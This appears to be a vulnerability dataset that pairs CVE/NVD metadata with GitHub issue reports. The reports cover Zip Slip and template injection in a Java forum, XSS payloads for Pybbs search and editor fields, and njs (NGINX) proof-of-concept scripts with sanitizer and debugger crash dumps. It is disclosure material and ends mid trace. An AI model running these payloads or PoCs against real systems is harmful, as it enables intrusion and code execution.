![image](https://user-images.githubusercontent.com/17904936/138825637-fa54b316-40c7-48c7-a6bc-79777b3ab1ec.png) The other is Zip Slip Vulnerability. The problem lies in the system upgrade function. ![image](https://user-images.githubusercontent.com/17904936/138827862-95600d99-e4a2-403b-b7cd-9ac6d87d74db.png) The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). UpgradeNow funciton in UpgradeManageAction.java unzip the uploaded zip file without check filenames . _ZipUtil.unZip(updatePackage_path, temp_path);_ The hacker can exploit the website like this. ![image](https://user-images.githubusercontent.com/17904936/138829767-a3c3b85c-200c-471e-8004-9cd0cb2412ba.png) ![image](https://user-images.githubusercontent.com/17904936/138829824-688dd8dd-b656-4028-a1ce-cd812c43e678.png) The third vulnerability is code injection. Background management template. ![image](https://user-images.githubusercontent.com/17904936/138830128-03726e8b-bb86-4452-a721-542726031b50.png) you can edit the html file. so we can insert evil code as the html will be processed by freemarker engine. ![image](https://user-images.githubusercontent.com/17904936/138830445-115ddc62-08f1-45dc-83d4-f68047f5e88f.png) when you access the website, the injected evil code will execute. ![image](https://user-images.githubusercontent.com/17904936/138830647-2130aacb-a546-404b-ba44-840bde049e96.png)
SEVEN high-risk vulnerabilities
https://api.github.com/repos/diyhi/bbs/issues/51/comments
1
2021-10-26T07:41:26Z
2021-10-28T01:01:18Z
https://github.com/diyhi/bbs/issues/51
1,035,946,107
51
3,201
CVE-2022-23391
2022-02-14T21:15:09.730
A cross-site scripting (XSS) vulnerability in Pybbs v6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload inserted into the Search box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tomoya92/pybbs/issues/171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tomoya92/pybbs/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pybbs_project:pybbs:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "A787EBC3-8457-4A7E-BD7B-A1BE26AAF96C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/tomoya92/pybbs/issues/171
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tomoya92", "pybbs" ]
## The first is located at the home page search Enter in the search box`11" onclick='alert(/xss/)'` ![image](https://user-images.githubusercontent.com/51900604/149858294-9fdb13ca-5575-44d3-9c93-b8a4c0f7f6a1.png) ## The second vulnerability is located in the backend In the topic editor in the background, enter`<img src=1 onerror=alert(/xss/)>` ![image](https://user-images.githubusercontent.com/51900604/149864571-cbbd7680-a3f6-415c-9c20-3ba09cd1aa60.png) ![image](https://user-images.githubusercontent.com/51900604/149864688-cd20e4ab-91b0-4351-8888-753e0b49aa0b.png) ## The third vulnerability is located at the topic search Enter in the search box `" onmouseover='alert(/xss/)'` ![image](https://user-images.githubusercontent.com/51900604/149864885-fece0b09-8671-4829-8c37-f7ac14acab0e.png) ## and many more ...
This forum has a large number of xss vulnerabilities
https://api.github.com/repos/atjiu/pybbs/issues/171/comments
1
2022-01-18T03:18:26Z
2023-05-10T02:03:57Z
https://github.com/atjiu/pybbs/issues/171
1,106,433,462
171
3,202
CVE-2021-46461
2022-02-14T22:15:07.717
njs through 0.7.0, used in NGINX, was discovered to contain an out-of-bounds array access via njs_vmcode_typeof in /src/njs_vmcode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/nginx/njs/commit/d457c9545e7e71ebb5c0479eb16b9d33175855e2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/450" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/nginx/njs/commit/d457c9545e7e71ebb5c0479eb16b9d33175855e2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/450" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3FD7035D-FB25-44D9-A1EA-345A65981E2B", "versionEndExcluding": null, "versionEndIncluding": "0.7.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/nginx/njs/issues/450
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ``` Version : 0.7.0 Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548 OS : Ubuntu 20.04 Configure : ./configure --address-sanitizer=YES ``` ## POC ``` function main() { const v2 = new ArrayBuffer(); const v3 = new DataView(v2); const v5 = typeof v3; } main(); ``` ## Stack Dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==466645==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe5fea5cc5b bp 0x7ffe64718cb0 sp 0x7ffe64718468 T0) ==466645==The signal is caused by a READ memory access. ==466645==Hint: address points to the zero page. #0 0x7fe5fea5cc5b in memcpy /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:142 #1 0x495737 in __asan_memcpy (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x495737) #2 0x4e54bf in njs_vmcode_typeof /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:1521:18 #3 0x4e54bf in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:594:23 #4 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #5 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #6 0x4dea17 in njs_vm_start /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:493:11 #7 0x4c7f3d in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:881:19 #8 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11 #9 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15 #10 0x7fe5fe9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:142 in memcpy ==466645==ABORTING ``` ## Credit P1umer, afang5472, Kotori of NeSE@IIE
illegal memcpy during njs_vmcode_typeof in /njs/src/njs_vmcode.c:1521:18
https://api.github.com/repos/nginx/njs/issues/450/comments
2
2021-12-24T06:33:59Z
2022-02-15T20:33:42Z
https://github.com/nginx/njs/issues/450
1,088,184,577
450
3,203
CVE-2021-46463
2022-02-14T22:15:07.793
njs through 0.7.1, used in NGINX, was discovered to contain a control flow hijack caused by a Type Confusion vulnerability in njs_promise_perform_then().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a40a85ff239497c6458c7dbef18f6a2736fe992" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/447" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a40a85ff239497c6458c7dbef18f6a2736fe992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/447" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "2DADC4D6-538B-4AC7-97B5-022B11495692", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "843" ]
843
https://github.com/nginx/njs/issues/447
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ```cpp Version : 0.7.0 Git Commit : bb796f7b3f3b65a78248f3ba86d0929eb292ca8e OS : Ubuntu 20.04 Configure : ./Configure --address-sanitizer=YES ``` ## Poc ```cpp function main() { function v0(v1,v2) { return 1 } var o = [1,2,3,4,5,6] const v1 = new Promise(v0); o.__proto__= v1; const v5 = [o]; const v7 = Promise.race(v5); console.log(o) } main(); ``` ## Analysis The output of the above poc is as follows: ```cpp Promise [1,2,3,4.000000000000001,5,6] ``` If I comment out Promise.race(v5): ```cpp function main() { function v0(v1,v2) { return 1 } var o = [1,2,3,4,5,6] const v1 = new Promise(v0); o.__proto__= v1; const v5 = [o]; // const v7 = Promise.race(v5); console.log(o) } main(); ``` Then the output will be normal as follows: ```cpp Promise [1,2,3,4,5,6] ``` This is because `njs_promise_perform_then` has Type Confusion vuln when dealing with promise objects. The code `data->is_handled = 1` will write the integer `1` to `is_handled` field of data that has been confused as `njs_promise_data_t`, although data may be of other types actually. ```cpp njs_int_t njs_promise_perform_then(njs_vm_t *vm, njs_value_t *value, njs_value_t *fulfilled, njs_value_t *rejected, njs_promise_capability_t *capability) { njs_int_t ret; njs_value_t arguments[2]; njs_promise_t *promise; njs_promise_data_t *data; [...] promise = njs_promise(value); data = njs_data(&promise->value); [...] data->is_handled = 1; [...] return NJS_OK; } ``` Therefore, when we try to change the data to the `Symbol` type: ```cpp function main() { const v1 = new Promise(()=>{}); Symbol.__proto__ = v1; const v5 = [Symbol]; const v7 = Promise.race(v5); } main(); ``` The following error will be reported as expected: ```cpp Program received signal SIGSEGV, Segmentation fault. 0x00000000005f2e77 in njs_promise_perform_then (vm=<optimized out>, value=<optimized out>, fulfilled=<optimized out>, rejected=<optimized out>, capability=<optimized out>) at src/njs_promise.c:999 999 data->is_handled = 1; LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────── RAX 0x9db00 RBX 0x7fffffff9d60 —▸ 0x7fffffff0112 ◂— 0x0 RCX 0xc4800000437 ◂— 0x0 RDX 0xc4800000438 ◂— 0x0 RDI 0x6240000021b8 —▸ 0x6250000d17b8 ◂— 0x6240000021b8 RSI 0x7fffffff9d40 ◂— 0xe483485354415541 R8 0x4edeb8 (njs_symbol_constructor+56) ◂— add dh, byte ptr [rcx] R9 0x614000009c68 —▸ 0x6100000000a0 ◂— 0x614000009c68 R10 0x98 R11 0x614000008858 ◂— 0x200000000000 R12 0x6250000c8d80 —▸ 0x6250000c8d00 ◂— 0x116 R13 0x7fffffff9d40 ◂— 0xe483485354415541 R14 0x6250000d17c0 —▸ 0x6240000021b8 —▸ 0x6250000d17b8 ◂— 0x6240000021b8 R15 0x6250000c8d00 ◂— 0x116 RBP 0x7fffffff9e10 —▸ 0x7fffffff9f10 —▸ 0x7fffffff9f50 —▸ 0x7fffffffa060 —▸ 0x7fffffffa1b0 ◂— ... RSP 0x7fffffff9d20 ◂— 0x41b58ab3 RIP 0x5f2e77 (njs_promise_perform_then+1831) ◂— mov dword ptr [r8], 1 ────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────── ► 0x5f2e77 <njs_promise_perform_then+1831> mov dword ptr [r8], 1 <0x4edeb8> 0x5f2e7e <njs_promise_perform_then+1838> test r15, r15 0x5f2e81 <njs_promise_perform_then+1841> je njs_promise_perform_then+1852 <njs_promise_perform_then+1852> 0x5f2e83 <njs_promise_perform_then+1843> mov rdi, qword ptr [rbx + 8] 0x5f2e87 <njs_promise_perform_then+1847> mov rsi, r15 0x5f2e8a <njs_promise_perform_then+1850> jmp njs_promise_perform_then+1863 <njs_promise_perform_then+1863> ↓ 0x5f2e97 <njs_promise_perform_then+1863> call njs_vm_retval_set <njs_vm_retval_set> 0x5f2e9c <njs_promise_perform_then+1868> xor eax, eax 0x5f2e9e <njs_promise_perform_then+1870> mov rcx, qword ptr [rbx + 0x18] 0x5f2ea2 <njs_promise_perform_then+1874> mov rsi, qword ptr [rbx + 0x48] 0x5f2ea6 <njs_promise_perform_then+1878> mov word ptr [rsi + 0x7fff8004], 0xf8f8 ─────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────── In file: /home/p1umer/Git/njs/src/njs_promise.c 994 if (njs_slow_path(ret != NJS_OK)) { 995 return ret; 996 } 997 } 998 ► 999 data->is_handled = 1; 1000 1001 if (capability == NULL) { 1002 njs_vm_retval_set(vm, &njs_value_undefined); 1003 1004 } else { ─────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff9d20 ◂— 0x41b58ab3 01:0008│ 0x7fffffff9d28 —▸ 0x66e001 ◂— '1 32 16 21 arguments.sroa.11:930' 02:0010│ 0x7fffffff9d30 —▸ 0x5f2750 (njs_promise_perform_then) ◂— push rbp 03:0018│ 0x7fffffff9d38 —▸ 0x494567 (__asan_memset+311) ◂— add rsp, 0x820 04:0020│ rsi r13 0x7fffffff9d40 ◂— 0xe483485354415541 05:0028│ 0x7fffffff9d48 ◂— 0xe3894840ec8348e0 06:0030│ 0x7fffffff9d50 —▸ 0x6250000c1900 ◂— 0x0 07:0038│ 0x7fffffff9d58 ◂— 0x0 ───────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────── ► f 0 0x5f2e77 njs_promise_perform_then+1831 f 1 0x5fb5b6 njs_promise_prototype_then+966 f 2 0x53a2ed njs_function_native_call+221 f 3 0x53892a njs_function_call2+1082 f 4 0x53892a njs_function_call2+1082 f 5 0x5fb0ff njs_promise_perform_race_handler+527 f 6 0x5fb0ff njs_promise_perform_race_handler+527 f 7 0x5fb0ff njs_promise_perform_race_handler+527 ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> ``` We deliberately introduce the non-writable `njs_symbol_constructor` to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking. ## Found by P1umer, Kotori, afang5472 @ IIE NeSE
Control flow hijack caused by Type Confusion of Promise object
https://api.github.com/repos/nginx/njs/issues/447/comments
1
2021-12-20T05:07:22Z
2022-02-15T20:37:16Z
https://github.com/nginx/njs/issues/447
1,084,365,523
447
3,204
CVE-2022-25139
2022-02-14T22:15:08.317
njs through 0.7.0, used in NGINX, was discovered to contain a heap use-after-free in njs_await_fulfilled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a07c2156a07ef307b6dcf3c2ca8571a5f1af7a6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/451" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a07c2156a07ef307b6dcf3c2ca8571a5f1af7a6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/451" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220303-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "98ABF5F9-B5AA-4A73-B525-5B89AE6BEA3E", "versionEndExcluding": "0.7.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/nginx/njs/issues/451
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ``` Version : 0.7.0 Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548 OS : Ubuntu 20.04 Configure : ./configure --address-sanitizer=YES ``` ## POC ``` function main() { async function v6(v7) { const v10 = v7(v7); const v11 = await "split"; Object.values(); } const v15 = v6(v6); } main(); ``` ## Stack Dump ``` ================================================================= ==465349==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250001a5c30 at pc 0x00000049595f bp 0x7ffde728bab0 sp 0x7ffde728b278 WRITE of size 88 at 0x6250001a5c30 thread T0 #0 0x49595e in __asan_memset (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x49595e) #1 0x538e7f in njs_function_frame_alloc /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:574:5 #2 0x538b50 in njs_function_native_frame /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:381:13 #3 0x4eae5f in njs_function_frame /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.h:151:16 #4 0x4eae5f in njs_function_frame_create /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:1737:16 #5 0x4e2cf8 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:767:23 #6 0x605359 in njs_await_fulfilled /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:104:11 #7 0x53b99c in njs_function_native_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:737:11 #8 0x539fd9 in njs_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:775:16 #9 0x539fd9 in njs_function_call2 /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:600:11 #10 0x5f4af7 in njs_function_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.h:179:12 #11 0x5f4af7 in njs_promise_reaction_job /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_promise.c:1182:15 #12 0x53b99c in njs_function_native_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:737:11 #13 0x4de4c0 in njs_vm_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:375:12 #14 0x4de4c0 in njs_vm_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:359:12 #15 0x4de4c0 in njs_vm_handle_events /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:524:19 #16 0x4de4c0 in njs_vm_run /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:479:12 #17 0x4c82a7 in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:915:15 #18 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11 #19 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15 #20 0x7fbad01760b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #21 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd) 0x6250001a5c30 is located 6960 bytes inside of 8192-byte region [0x6250001a4100,0x6250001a6100) freed by thread T0 here: #0 0x495f7d in free (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x495f7d) #1 0x53bcc9 in njs_function_frame_free /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:795:13 #2 0x4e97a8 in njs_vmcode_return /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:1807:5 #3 0x4e97a8 in njs_vmcode_await /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:1906:12 #4 0x4e97a8 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:829:24 #5 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #6 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #7 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #8 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #9 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #10 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #11 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #12 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #13 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #14 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #15 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #16 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #17 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #18 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #19 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #20 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #21 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #22 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #23 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #24 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #25 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #26 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #27 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #28 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #29 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #30 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #31 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 previously allocated by thread T0 here: #0 0x496c97 in posix_memalign 